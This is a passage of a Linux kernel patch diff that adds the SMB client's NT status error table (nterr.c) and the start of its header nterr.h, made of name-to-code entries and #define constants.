++	{"NT_STATUS_APP_INIT_FAILURE", NT_STATUS_APP_INIT_FAILURE},
++	{"NT_STATUS_PAGEFILE_CREATE_FAILED",
++	 NT_STATUS_PAGEFILE_CREATE_FAILED},
++	{"NT_STATUS_NO_PAGEFILE", NT_STATUS_NO_PAGEFILE},
++	{"NT_STATUS_INVALID_LEVEL", NT_STATUS_INVALID_LEVEL},
++	{"NT_STATUS_WRONG_PASSWORD_CORE", NT_STATUS_WRONG_PASSWORD_CORE},
++	{"NT_STATUS_ILLEGAL_FLOAT_CONTEXT",
++	 NT_STATUS_ILLEGAL_FLOAT_CONTEXT},
++	{"NT_STATUS_PIPE_BROKEN", NT_STATUS_PIPE_BROKEN},
++	{"NT_STATUS_REGISTRY_CORRUPT", NT_STATUS_REGISTRY_CORRUPT},
++	{"NT_STATUS_REGISTRY_IO_FAILED", NT_STATUS_REGISTRY_IO_FAILED},
++	{"NT_STATUS_NO_EVENT_PAIR", NT_STATUS_NO_EVENT_PAIR},
++	{"NT_STATUS_UNRECOGNIZED_VOLUME", NT_STATUS_UNRECOGNIZED_VOLUME},
++	{"NT_STATUS_SERIAL_NO_DEVICE_INITED",
++	 NT_STATUS_SERIAL_NO_DEVICE_INITED},
++	{"NT_STATUS_NO_SUCH_ALIAS", NT_STATUS_NO_SUCH_ALIAS},
++	{"NT_STATUS_MEMBER_NOT_IN_ALIAS", NT_STATUS_MEMBER_NOT_IN_ALIAS},
++	{"NT_STATUS_MEMBER_IN_ALIAS", NT_STATUS_MEMBER_IN_ALIAS},
++	{"NT_STATUS_ALIAS_EXISTS", NT_STATUS_ALIAS_EXISTS},
++	{"NT_STATUS_LOGON_NOT_GRANTED", NT_STATUS_LOGON_NOT_GRANTED},
++	{"NT_STATUS_TOO_MANY_SECRETS", NT_STATUS_TOO_MANY_SECRETS},
++	{"NT_STATUS_SECRET_TOO_LONG", NT_STATUS_SECRET_TOO_LONG},
++	{"NT_STATUS_INTERNAL_DB_ERROR", NT_STATUS_INTERNAL_DB_ERROR},
++	{"NT_STATUS_FULLSCREEN_MODE", NT_STATUS_FULLSCREEN_MODE},
++	{"NT_STATUS_TOO_MANY_CONTEXT_IDS", NT_STATUS_TOO_MANY_CONTEXT_IDS},
++	{"NT_STATUS_LOGON_TYPE_NOT_GRANTED",
++	 NT_STATUS_LOGON_TYPE_NOT_GRANTED},
++	{"NT_STATUS_NOT_REGISTRY_FILE", NT_STATUS_NOT_REGISTRY_FILE},
++	{"NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED",
++	 NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED},
++	{"NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR",
++	 NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR},
++	{"NT_STATUS_FT_MISSING_MEMBER", NT_STATUS_FT_MISSING_MEMBER},
++	{"NT_STATUS_ILL_FORMED_SERVICE_ENTRY",
++	 NT_STATUS_ILL_FORMED_SERVICE_ENTRY},
++	{"NT_STATUS_ILLEGAL_CHARACTER", NT_STATUS_ILLEGAL_CHARACTER},
++	{"NT_STATUS_UNMAPPABLE_CHARACTER", NT_STATUS_UNMAPPABLE_CHARACTER},
++	{"NT_STATUS_UNDEFINED_CHARACTER", NT_STATUS_UNDEFINED_CHARACTER},
++	{"NT_STATUS_FLOPPY_VOLUME", NT_STATUS_FLOPPY_VOLUME},
++	{"NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND",
++	 NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND},
++	{"NT_STATUS_FLOPPY_WRONG_CYLINDER",
++	 NT_STATUS_FLOPPY_WRONG_CYLINDER},
++	{"NT_STATUS_FLOPPY_UNKNOWN_ERROR", NT_STATUS_FLOPPY_UNKNOWN_ERROR},
++	{"NT_STATUS_FLOPPY_BAD_REGISTERS", NT_STATUS_FLOPPY_BAD_REGISTERS},
++	{"NT_STATUS_DISK_RECALIBRATE_FAILED",
++	 NT_STATUS_DISK_RECALIBRATE_FAILED},
++	{"NT_STATUS_DISK_OPERATION_FAILED",
++	 NT_STATUS_DISK_OPERATION_FAILED},
++	{"NT_STATUS_DISK_RESET_FAILED", NT_STATUS_DISK_RESET_FAILED},
++	{"NT_STATUS_SHARED_IRQ_BUSY", NT_STATUS_SHARED_IRQ_BUSY},
++	{"NT_STATUS_FT_ORPHANING", NT_STATUS_FT_ORPHANING},
++	{"NT_STATUS_PARTITION_FAILURE", NT_STATUS_PARTITION_FAILURE},
++	{"NT_STATUS_INVALID_BLOCK_LENGTH", NT_STATUS_INVALID_BLOCK_LENGTH},
++	{"NT_STATUS_DEVICE_NOT_PARTITIONED",
++	 NT_STATUS_DEVICE_NOT_PARTITIONED},
++	{"NT_STATUS_UNABLE_TO_LOCK_MEDIA", NT_STATUS_UNABLE_TO_LOCK_MEDIA},
++	{"NT_STATUS_UNABLE_TO_UNLOAD_MEDIA",
++	 NT_STATUS_UNABLE_TO_UNLOAD_MEDIA},
++	{"NT_STATUS_EOM_OVERFLOW", NT_STATUS_EOM_OVERFLOW},
++	{"NT_STATUS_NO_MEDIA", NT_STATUS_NO_MEDIA},
++	{"NT_STATUS_NO_SUCH_MEMBER", NT_STATUS_NO_SUCH_MEMBER},
++	{"NT_STATUS_INVALID_MEMBER", NT_STATUS_INVALID_MEMBER},
++	{"NT_STATUS_KEY_DELETED", NT_STATUS_KEY_DELETED},
++	{"NT_STATUS_NO_LOG_SPACE", NT_STATUS_NO_LOG_SPACE},
++	{"NT_STATUS_TOO_MANY_SIDS", NT_STATUS_TOO_MANY_SIDS},
++	{"NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED",
++	 NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED},
++	{"NT_STATUS_KEY_HAS_CHILDREN", NT_STATUS_KEY_HAS_CHILDREN},
++	{"NT_STATUS_CHILD_MUST_BE_VOLATILE",
++	 NT_STATUS_CHILD_MUST_BE_VOLATILE},
++	{"NT_STATUS_DEVICE_CONFIGURATION_ERROR",
++	 NT_STATUS_DEVICE_CONFIGURATION_ERROR},
++	{"NT_STATUS_DRIVER_INTERNAL_ERROR",
++	 NT_STATUS_DRIVER_INTERNAL_ERROR},
++	{"NT_STATUS_INVALID_DEVICE_STATE", NT_STATUS_INVALID_DEVICE_STATE},
++	{"NT_STATUS_IO_DEVICE_ERROR", NT_STATUS_IO_DEVICE_ERROR},
++	{"NT_STATUS_DEVICE_PROTOCOL_ERROR",
++	 NT_STATUS_DEVICE_PROTOCOL_ERROR},
++	{"NT_STATUS_BACKUP_CONTROLLER", NT_STATUS_BACKUP_CONTROLLER},
++	{"NT_STATUS_LOG_FILE_FULL", NT_STATUS_LOG_FILE_FULL},
++	{"NT_STATUS_TOO_LATE", NT_STATUS_TOO_LATE},
++	{"NT_STATUS_NO_TRUST_LSA_SECRET", NT_STATUS_NO_TRUST_LSA_SECRET},
++	{"NT_STATUS_NO_TRUST_SAM_ACCOUNT", NT_STATUS_NO_TRUST_SAM_ACCOUNT},
++	{"NT_STATUS_TRUSTED_DOMAIN_FAILURE",
++	 NT_STATUS_TRUSTED_DOMAIN_FAILURE},
++	{"NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE",
++	 NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE},
++	{"NT_STATUS_EVENTLOG_FILE_CORRUPT",
++	 NT_STATUS_EVENTLOG_FILE_CORRUPT},
++	{"NT_STATUS_EVENTLOG_CANT_START", NT_STATUS_EVENTLOG_CANT_START},
++	{"NT_STATUS_TRUST_FAILURE", NT_STATUS_TRUST_FAILURE},
++	{"NT_STATUS_MUTANT_LIMIT_EXCEEDED",
++	 NT_STATUS_MUTANT_LIMIT_EXCEEDED},
++	{"NT_STATUS_NETLOGON_NOT_STARTED", NT_STATUS_NETLOGON_NOT_STARTED},
++	{"NT_STATUS_ACCOUNT_EXPIRED", NT_STATUS_ACCOUNT_EXPIRED},
++	{"NT_STATUS_POSSIBLE_DEADLOCK", NT_STATUS_POSSIBLE_DEADLOCK},
++	{"NT_STATUS_NETWORK_CREDENTIAL_CONFLICT",
++	 NT_STATUS_NETWORK_CREDENTIAL_CONFLICT},
++	{"NT_STATUS_REMOTE_SESSION_LIMIT", NT_STATUS_REMOTE_SESSION_LIMIT},
++	{"NT_STATUS_EVENTLOG_FILE_CHANGED",
++	 NT_STATUS_EVENTLOG_FILE_CHANGED},
++	{"NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT",
++	 NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT},
++	{"NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT",
++	 NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT},
++	{"NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT",
++	 NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT},
++	{"NT_STATUS_DOMAIN_TRUST_INCONSISTENT",
++	 NT_STATUS_DOMAIN_TRUST_INCONSISTENT},
++	{"NT_STATUS_FS_DRIVER_REQUIRED", NT_STATUS_FS_DRIVER_REQUIRED},
++	{"NT_STATUS_NO_USER_SESSION_KEY", NT_STATUS_NO_USER_SESSION_KEY},
++	{"NT_STATUS_USER_SESSION_DELETED", NT_STATUS_USER_SESSION_DELETED},
++	{"NT_STATUS_RESOURCE_LANG_NOT_FOUND",
++	 NT_STATUS_RESOURCE_LANG_NOT_FOUND},
++	{"NT_STATUS_INSUFF_SERVER_RESOURCES",
++	 NT_STATUS_INSUFF_SERVER_RESOURCES},
++	{"NT_STATUS_INVALID_BUFFER_SIZE", NT_STATUS_INVALID_BUFFER_SIZE},
++	{"NT_STATUS_INVALID_ADDRESS_COMPONENT",
++	 NT_STATUS_INVALID_ADDRESS_COMPONENT},
++	{"NT_STATUS_INVALID_ADDRESS_WILDCARD",
++	 NT_STATUS_INVALID_ADDRESS_WILDCARD},
++	{"NT_STATUS_TOO_MANY_ADDRESSES", NT_STATUS_TOO_MANY_ADDRESSES},
++	{"NT_STATUS_ADDRESS_ALREADY_EXISTS",
++	 NT_STATUS_ADDRESS_ALREADY_EXISTS},
++	{"NT_STATUS_ADDRESS_CLOSED", NT_STATUS_ADDRESS_CLOSED},
++	{"NT_STATUS_CONNECTION_DISCONNECTED",
++	 NT_STATUS_CONNECTION_DISCONNECTED},
++	{"NT_STATUS_CONNECTION_RESET", NT_STATUS_CONNECTION_RESET},
++	{"NT_STATUS_TOO_MANY_NODES", NT_STATUS_TOO_MANY_NODES},
++	{"NT_STATUS_TRANSACTION_ABORTED", NT_STATUS_TRANSACTION_ABORTED},
++	{"NT_STATUS_TRANSACTION_TIMED_OUT",
++	 NT_STATUS_TRANSACTION_TIMED_OUT},
++	{"NT_STATUS_TRANSACTION_NO_RELEASE",
++	 NT_STATUS_TRANSACTION_NO_RELEASE},
++	{"NT_STATUS_TRANSACTION_NO_MATCH", NT_STATUS_TRANSACTION_NO_MATCH},
++	{"NT_STATUS_TRANSACTION_RESPONDED",
++	 NT_STATUS_TRANSACTION_RESPONDED},
++	{"NT_STATUS_TRANSACTION_INVALID_ID",
++	 NT_STATUS_TRANSACTION_INVALID_ID},
++	{"NT_STATUS_TRANSACTION_INVALID_TYPE",
++	 NT_STATUS_TRANSACTION_INVALID_TYPE},
++	{"NT_STATUS_NOT_SERVER_SESSION", NT_STATUS_NOT_SERVER_SESSION},
++	{"NT_STATUS_NOT_CLIENT_SESSION", NT_STATUS_NOT_CLIENT_SESSION},
++	{"NT_STATUS_CANNOT_LOAD_REGISTRY_FILE",
++	 NT_STATUS_CANNOT_LOAD_REGISTRY_FILE},
++	{"NT_STATUS_DEBUG_ATTACH_FAILED", NT_STATUS_DEBUG_ATTACH_FAILED},
++	{"NT_STATUS_SYSTEM_PROCESS_TERMINATED",
++	 NT_STATUS_SYSTEM_PROCESS_TERMINATED},
++	{"NT_STATUS_DATA_NOT_ACCEPTED", NT_STATUS_DATA_NOT_ACCEPTED},
++	{"NT_STATUS_NO_BROWSER_SERVERS_FOUND",
++	 NT_STATUS_NO_BROWSER_SERVERS_FOUND},
++	{"NT_STATUS_VDM_HARD_ERROR", NT_STATUS_VDM_HARD_ERROR},
++	{"NT_STATUS_DRIVER_CANCEL_TIMEOUT",
++	 NT_STATUS_DRIVER_CANCEL_TIMEOUT},
++	{"NT_STATUS_REPLY_MESSAGE_MISMATCH",
++	 NT_STATUS_REPLY_MESSAGE_MISMATCH},
++	{"NT_STATUS_MAPPED_ALIGNMENT", NT_STATUS_MAPPED_ALIGNMENT},
++	{"NT_STATUS_IMAGE_CHECKSUM_MISMATCH",
++	 NT_STATUS_IMAGE_CHECKSUM_MISMATCH},
++	{"NT_STATUS_LOST_WRITEBEHIND_DATA",
++	 NT_STATUS_LOST_WRITEBEHIND_DATA},
++	{"NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID",
++	 NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID},
++	{"NT_STATUS_PASSWORD_MUST_CHANGE", NT_STATUS_PASSWORD_MUST_CHANGE},
++	{"NT_STATUS_NOT_FOUND", NT_STATUS_NOT_FOUND},
++	{"NT_STATUS_NOT_TINY_STREAM", NT_STATUS_NOT_TINY_STREAM},
++	{"NT_STATUS_RECOVERY_FAILURE", NT_STATUS_RECOVERY_FAILURE},
++	{"NT_STATUS_STACK_OVERFLOW_READ", NT_STATUS_STACK_OVERFLOW_READ},
++	{"NT_STATUS_FAIL_CHECK", NT_STATUS_FAIL_CHECK},
++	{"NT_STATUS_DUPLICATE_OBJECTID", NT_STATUS_DUPLICATE_OBJECTID},
++	{"NT_STATUS_OBJECTID_EXISTS", NT_STATUS_OBJECTID_EXISTS},
++	{"NT_STATUS_CONVERT_TO_LARGE", NT_STATUS_CONVERT_TO_LARGE},
++	{"NT_STATUS_RETRY", NT_STATUS_RETRY},
++	{"NT_STATUS_FOUND_OUT_OF_SCOPE", NT_STATUS_FOUND_OUT_OF_SCOPE},
++	{"NT_STATUS_ALLOCATE_BUCKET", NT_STATUS_ALLOCATE_BUCKET},
++	{"NT_STATUS_PROPSET_NOT_FOUND", NT_STATUS_PROPSET_NOT_FOUND},
++	{"NT_STATUS_MARSHALL_OVERFLOW", NT_STATUS_MARSHALL_OVERFLOW},
++	{"NT_STATUS_INVALID_VARIANT", NT_STATUS_INVALID_VARIANT},
++	{"NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND",
++	 NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND},
++	{"NT_STATUS_ACCOUNT_LOCKED_OUT", NT_STATUS_ACCOUNT_LOCKED_OUT},
++	{"NT_STATUS_HANDLE_NOT_CLOSABLE", NT_STATUS_HANDLE_NOT_CLOSABLE},
++	{"NT_STATUS_CONNECTION_REFUSED", NT_STATUS_CONNECTION_REFUSED},
++	{"NT_STATUS_GRACEFUL_DISCONNECT", NT_STATUS_GRACEFUL_DISCONNECT},
++	{"NT_STATUS_ADDRESS_ALREADY_ASSOCIATED",
++	 NT_STATUS_ADDRESS_ALREADY_ASSOCIATED},
++	{"NT_STATUS_ADDRESS_NOT_ASSOCIATED",
++	 NT_STATUS_ADDRESS_NOT_ASSOCIATED},
++	{"NT_STATUS_CONNECTION_INVALID", NT_STATUS_CONNECTION_INVALID},
++	{"NT_STATUS_CONNECTION_ACTIVE", NT_STATUS_CONNECTION_ACTIVE},
++	{"NT_STATUS_NETWORK_UNREACHABLE", NT_STATUS_NETWORK_UNREACHABLE},
++	{"NT_STATUS_HOST_UNREACHABLE", NT_STATUS_HOST_UNREACHABLE},
++	{"NT_STATUS_PROTOCOL_UNREACHABLE", NT_STATUS_PROTOCOL_UNREACHABLE},
++	{"NT_STATUS_PORT_UNREACHABLE", NT_STATUS_PORT_UNREACHABLE},
++	{"NT_STATUS_REQUEST_ABORTED", NT_STATUS_REQUEST_ABORTED},
++	{"NT_STATUS_CONNECTION_ABORTED", NT_STATUS_CONNECTION_ABORTED},
++	{"NT_STATUS_BAD_COMPRESSION_BUFFER",
++	 NT_STATUS_BAD_COMPRESSION_BUFFER},
++	{"NT_STATUS_USER_MAPPED_FILE", NT_STATUS_USER_MAPPED_FILE},
++	{"NT_STATUS_AUDIT_FAILED", NT_STATUS_AUDIT_FAILED},
++	{"NT_STATUS_TIMER_RESOLUTION_NOT_SET",
++	 NT_STATUS_TIMER_RESOLUTION_NOT_SET},
++	{"NT_STATUS_CONNECTION_COUNT_LIMIT",
++	 NT_STATUS_CONNECTION_COUNT_LIMIT},
++	{"NT_STATUS_LOGIN_TIME_RESTRICTION",
++	 NT_STATUS_LOGIN_TIME_RESTRICTION},
++	{"NT_STATUS_LOGIN_WKSTA_RESTRICTION",
++	 NT_STATUS_LOGIN_WKSTA_RESTRICTION},
++	{"NT_STATUS_IMAGE_MP_UP_MISMATCH", NT_STATUS_IMAGE_MP_UP_MISMATCH},
++	{"NT_STATUS_INSUFFICIENT_LOGON_INFO",
++	 NT_STATUS_INSUFFICIENT_LOGON_INFO},
++	{"NT_STATUS_BAD_DLL_ENTRYPOINT", NT_STATUS_BAD_DLL_ENTRYPOINT},
++	{"NT_STATUS_BAD_SERVICE_ENTRYPOINT",
++	 NT_STATUS_BAD_SERVICE_ENTRYPOINT},
++	{"NT_STATUS_LPC_REPLY_LOST", NT_STATUS_LPC_REPLY_LOST},
++	{"NT_STATUS_IP_ADDRESS_CONFLICT1", NT_STATUS_IP_ADDRESS_CONFLICT1},
++	{"NT_STATUS_IP_ADDRESS_CONFLICT2", NT_STATUS_IP_ADDRESS_CONFLICT2},
++	{"NT_STATUS_REGISTRY_QUOTA_LIMIT", NT_STATUS_REGISTRY_QUOTA_LIMIT},
++	{"NT_STATUS_PATH_NOT_COVERED", NT_STATUS_PATH_NOT_COVERED},
++	{"NT_STATUS_NO_CALLBACK_ACTIVE", NT_STATUS_NO_CALLBACK_ACTIVE},
++	{"NT_STATUS_LICENSE_QUOTA_EXCEEDED",
++	 NT_STATUS_LICENSE_QUOTA_EXCEEDED},
++	{"NT_STATUS_PWD_TOO_SHORT", NT_STATUS_PWD_TOO_SHORT},
++	{"NT_STATUS_PWD_TOO_RECENT", NT_STATUS_PWD_TOO_RECENT},
++	{"NT_STATUS_PWD_HISTORY_CONFLICT", NT_STATUS_PWD_HISTORY_CONFLICT},
++	{"NT_STATUS_PLUGPLAY_NO_DEVICE", NT_STATUS_PLUGPLAY_NO_DEVICE},
++	{"NT_STATUS_UNSUPPORTED_COMPRESSION",
++	 NT_STATUS_UNSUPPORTED_COMPRESSION},
++	{"NT_STATUS_INVALID_HW_PROFILE", NT_STATUS_INVALID_HW_PROFILE},
++	{"NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH",
++	 NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH},
++	{"NT_STATUS_DRIVER_ORDINAL_NOT_FOUND",
++	 NT_STATUS_DRIVER_ORDINAL_NOT_FOUND},
++	{"NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND",
++	 NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND},
++	{"NT_STATUS_RESOURCE_NOT_OWNED", NT_STATUS_RESOURCE_NOT_OWNED},
++	{"NT_STATUS_TOO_MANY_LINKS", NT_STATUS_TOO_MANY_LINKS},
++	{"NT_STATUS_QUOTA_LIST_INCONSISTENT",
++	 NT_STATUS_QUOTA_LIST_INCONSISTENT},
++	{"NT_STATUS_FILE_IS_OFFLINE", NT_STATUS_FILE_IS_OFFLINE},
++	{"NT_STATUS_NO_MORE_ENTRIES", NT_STATUS_NO_MORE_ENTRIES},
++	{"NT_STATUS_MORE_ENTRIES", NT_STATUS_MORE_ENTRIES},
++	{"NT_STATUS_SOME_UNMAPPED", NT_STATUS_SOME_UNMAPPED},
++	{NULL, 0}
++};
+diff --git a/fs/smb/client/nterr.h b/fs/smb/client/nterr.h
+new file mode 100644
+index 0000000000000..edd4741cab0a1
+--- /dev/null
++++ b/fs/smb/client/nterr.h
+@@ -0,0 +1,551 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++   Unix SMB/Netbios implementation.
++   Version 1.9.
++   NT error code constants
++   Copyright (C) Andrew Tridgell              1992-2000
++   Copyright (C) John H Terpstra              1996-2000
++   Copyright (C) Luke Kenneth Casson Leighton 1996-2000
++   Copyright (C) Paul Ashton                  1998-2000
++
++*/
++
++
++
++#ifndef _NTERR_H
++#define _NTERR_H
++
++struct nt_err_code_struct {
++	char *nt_errstr;
++	__u32 nt_errcode;
++};
++
++extern const struct nt_err_code_struct nt_errs[];
++
++/* Win32 Status codes. */
++#define NT_STATUS_MORE_ENTRIES         0x0105
++#define NT_ERROR_INVALID_PARAMETER     0x0057
++#define NT_ERROR_INSUFFICIENT_BUFFER   0x007a
++#define NT_STATUS_1804                 0x070c
++#define NT_STATUS_NOTIFY_ENUM_DIR      0x010c
++
++/*
++ * Win32 Error codes extracted using a loop in smbclient then printing a netmon
++ * sniff to a file.
++ */
++
++#define NT_STATUS_OK                   0x0000
++#define NT_STATUS_SOME_UNMAPPED        0x0107
++#define NT_STATUS_BUFFER_OVERFLOW  0x80000005
++#define NT_STATUS_NO_MORE_ENTRIES  0x8000001a
++#define NT_STATUS_MEDIA_CHANGED    0x8000001c
++#define NT_STATUS_END_OF_MEDIA     0x8000001e
++#define NT_STATUS_MEDIA_CHECK      0x80000020
++#define NT_STATUS_NO_DATA_DETECTED 0x8000001c
++#define NT_STATUS_STOPPED_ON_SYMLINK 0x8000002d
++#define NT_STATUS_DEVICE_REQUIRES_CLEANING 0x80000288
++#define NT_STATUS_DEVICE_DOOR_OPEN 0x80000288
++#define NT_STATUS_UNSUCCESSFUL 0xC0000000 | 0x0001
++#define NT_STATUS_NOT_IMPLEMENTED 0xC0000000 | 0x0002
++#define NT_STATUS_INVALID_INFO_CLASS 0xC0000000 | 0x0003
++#define NT_STATUS_INFO_LENGTH_MISMATCH 0xC0000000 | 0x0004
++#define NT_STATUS_ACCESS_VIOLATION 0xC0000000 | 0x0005
++#define NT_STATUS_IN_PAGE_ERROR 0xC0000000 | 0x0006
++#define NT_STATUS_PAGEFILE_QUOTA 0xC0000000 | 0x0007
++#define NT_STATUS_INVALID_HANDLE 0xC0000000 | 0x0008
++#define NT_STATUS_BAD_INITIAL_STACK 0xC0000000 | 0x0009
++#define NT_STATUS_BAD_INITIAL_PC 0xC0000000 | 0x000a
++#define NT_STATUS_INVALID_CID 0xC0000000 | 0x000b
++#define NT_STATUS_TIMER_NOT_CANCELED 0xC0000000 | 0x000c
++#define NT_STATUS_INVALID_PARAMETER 0xC0000000 | 0x000d
++#define NT_STATUS_NO_SUCH_DEVICE 0xC0000000 | 0x000e
++#define NT_STATUS_NO_SUCH_FILE 0xC0000000 | 0x000f
++#define NT_STATUS_INVALID_DEVICE_REQUEST 0xC0000000 | 0x0010
++#define NT_STATUS_END_OF_FILE 0xC0000000 | 0x0011
++#define NT_STATUS_WRONG_VOLUME 0xC0000000 | 0x0012
++#define NT_STATUS_NO_MEDIA_IN_DEVICE 0xC0000000 | 0x0013
++#define NT_STATUS_UNRECOGNIZED_MEDIA 0xC0000000 | 0x0014
++#define NT_STATUS_NONEXISTENT_SECTOR 0xC0000000 | 0x0015
++#define NT_STATUS_MORE_PROCESSING_REQUIRED 0xC0000000 | 0x0016
++#define NT_STATUS_NO_MEMORY 0xC0000000 | 0x0017
++#define NT_STATUS_CONFLICTING_ADDRESSES 0xC0000000 | 0x0018
++#define NT_STATUS_NOT_MAPPED_VIEW 0xC0000000 | 0x0019
++#define NT_STATUS_UNABLE_TO_FREE_VM 0x80000000 | 0x001a
++#define NT_STATUS_UNABLE_TO_DELETE_SECTION 0xC0000000 | 0x001b
++#define NT_STATUS_INVALID_SYSTEM_SERVICE 0xC0000000 | 0x001c
++#define NT_STATUS_ILLEGAL_INSTRUCTION 0xC0000000 | 0x001d
++#define NT_STATUS_INVALID_LOCK_SEQUENCE 0xC0000000 | 0x001e
++#define NT_STATUS_INVALID_VIEW_SIZE 0xC0000000 | 0x001f
++#define NT_STATUS_INVALID_FILE_FOR_SECTION 0xC0000000 | 0x0020
++#define NT_STATUS_ALREADY_COMMITTED 0xC0000000 | 0x0021
++#define NT_STATUS_ACCESS_DENIED 0xC0000000 | 0x0022
++#define NT_STATUS_BUFFER_TOO_SMALL 0xC0000000 | 0x0023
++#define NT_STATUS_OBJECT_TYPE_MISMATCH 0xC0000000 | 0x0024
++#define NT_STATUS_NONCONTINUABLE_EXCEPTION 0xC0000000 | 0x0025
++#define NT_STATUS_INVALID_DISPOSITION 0xC0000000 | 0x0026
++#define NT_STATUS_UNWIND 0xC0000000 | 0x0027
++#define NT_STATUS_BAD_STACK 0xC0000000 | 0x0028
++#define NT_STATUS_INVALID_UNWIND_TARGET 0xC0000000 | 0x0029
++#define NT_STATUS_NOT_LOCKED 0xC0000000 | 0x002a
++#define NT_STATUS_PARITY_ERROR 0xC0000000 | 0x002b
++#define NT_STATUS_UNABLE_TO_DECOMMIT_VM 0xC0000000 | 0x002c
++#define NT_STATUS_NOT_COMMITTED 0xC0000000 | 0x002d
++#define NT_STATUS_INVALID_PORT_ATTRIBUTES 0xC0000000 | 0x002e
++#define NT_STATUS_PORT_MESSAGE_TOO_LONG 0xC0000000 | 0x002f
++#define NT_STATUS_INVALID_PARAMETER_MIX 0xC0000000 | 0x0030
++#define NT_STATUS_INVALID_QUOTA_LOWER 0xC0000000 | 0x0031
++#define NT_STATUS_DISK_CORRUPT_ERROR 0xC0000000 | 0x0032
++#define NT_STATUS_OBJECT_NAME_INVALID 0xC0000000 | 0x0033
++#define NT_STATUS_OBJECT_NAME_NOT_FOUND 0xC0000000 | 0x0034
++#define NT_STATUS_OBJECT_NAME_COLLISION 0xC0000000 | 0x0035
++#define NT_STATUS_HANDLE_NOT_WAITABLE 0xC0000000 | 0x0036
++#define NT_STATUS_PORT_DISCONNECTED 0xC0000000 | 0x0037
++#define NT_STATUS_DEVICE_ALREADY_ATTACHED 0xC0000000 | 0x0038
++#define NT_STATUS_OBJECT_PATH_INVALID 0xC0000000 | 0x0039
++#define NT_STATUS_OBJECT_PATH_NOT_FOUND 0xC0000000 | 0x003a
++#define NT_STATUS_OBJECT_PATH_SYNTAX_BAD 0xC0000000 | 0x003b
++#define NT_STATUS_DATA_OVERRUN 0xC0000000 | 0x003c
++#define NT_STATUS_DATA_LATE_ERROR 0xC0000000 | 0x003d
++#define NT_STATUS_DATA_ERROR 0xC0000000 | 0x003e
++#define NT_STATUS_CRC_ERROR 0xC0000000 | 0x003f
++#define NT_STATUS_SECTION_TOO_BIG 0xC0000000 | 0x0040
++#define NT_STATUS_PORT_CONNECTION_REFUSED 0xC0000000 | 0x0041
++#define NT_STATUS_INVALID_PORT_HANDLE 0xC0000000 | 0x0042
++#define NT_STATUS_SHARING_VIOLATION 0xC0000000 | 0x0043
++#define NT_STATUS_QUOTA_EXCEEDED 0xC0000000 | 0x0044
++#define NT_STATUS_INVALID_PAGE_PROTECTION 0xC0000000 | 0x0045
++#define NT_STATUS_MUTANT_NOT_OWNED 0xC0000000 | 0x0046
++#define NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED 0xC0000000 | 0x0047
++#define NT_STATUS_PORT_ALREADY_SET 0xC0000000 | 0x0048
++#define NT_STATUS_SECTION_NOT_IMAGE 0xC0000000 | 0x0049
++#define NT_STATUS_SUSPEND_COUNT_EXCEEDED 0xC0000000 | 0x004a
++#define NT_STATUS_THREAD_IS_TERMINATING 0xC0000000 | 0x004b
++#define NT_STATUS_BAD_WORKING_SET_LIMIT 0xC0000000 | 0x004c
++#define NT_STATUS_INCOMPATIBLE_FILE_MAP 0xC0000000 | 0x004d
++#define NT_STATUS_SECTION_PROTECTION 0xC0000000 | 0x004e
++#define NT_STATUS_EAS_NOT_SUPPORTED 0xC0000000 | 0x004f
++#define NT_STATUS_EA_TOO_LARGE 0xC0000000 | 0x0050
++#define NT_STATUS_NONEXISTENT_EA_ENTRY 0xC0000000 | 0x0051
++#define NT_STATUS_NO_EAS_ON_FILE 0xC0000000 | 0x0052
++#define NT_STATUS_EA_CORRUPT_ERROR 0xC0000000 | 0x0053
++#define NT_STATUS_FILE_LOCK_CONFLICT 0xC0000000 | 0x0054
++#define NT_STATUS_LOCK_NOT_GRANTED 0xC0000000 | 0x0055
++#define NT_STATUS_DELETE_PENDING 0xC0000000 | 0x0056
++#define NT_STATUS_CTL_FILE_NOT_SUPPORTED 0xC0000000 | 0x0057
++#define NT_STATUS_UNKNOWN_REVISION 0xC0000000 | 0x0058
++#define NT_STATUS_REVISION_MISMATCH 0xC0000000 | 0x0059
++#define NT_STATUS_INVALID_OWNER 0xC0000000 | 0x005a
++#define NT_STATUS_INVALID_PRIMARY_GROUP 0xC0000000 | 0x005b
++#define NT_STATUS_NO_IMPERSONATION_TOKEN 0xC0000000 | 0x005c
++#define NT_STATUS_CANT_DISABLE_MANDATORY 0xC0000000 | 0x005d
++#define NT_STATUS_NO_LOGON_SERVERS 0xC0000000 | 0x005e
++#define NT_STATUS_NO_SUCH_LOGON_SESSION 0xC0000000 | 0x005f
++#define NT_STATUS_NO_SUCH_PRIVILEGE 0xC0000000 | 0x0060
++#define NT_STATUS_PRIVILEGE_NOT_HELD 0xC0000000 | 0x0061
++#define NT_STATUS_INVALID_ACCOUNT_NAME 0xC0000000 | 0x0062
++#define NT_STATUS_USER_EXISTS 0xC0000000 | 0x0063
++#define NT_STATUS_NO_SUCH_USER 0xC0000000 | 0x0064
++#define NT_STATUS_GROUP_EXISTS 0xC0000000 | 0x0065
++#define NT_STATUS_NO_SUCH_GROUP 0xC0000000 | 0x0066
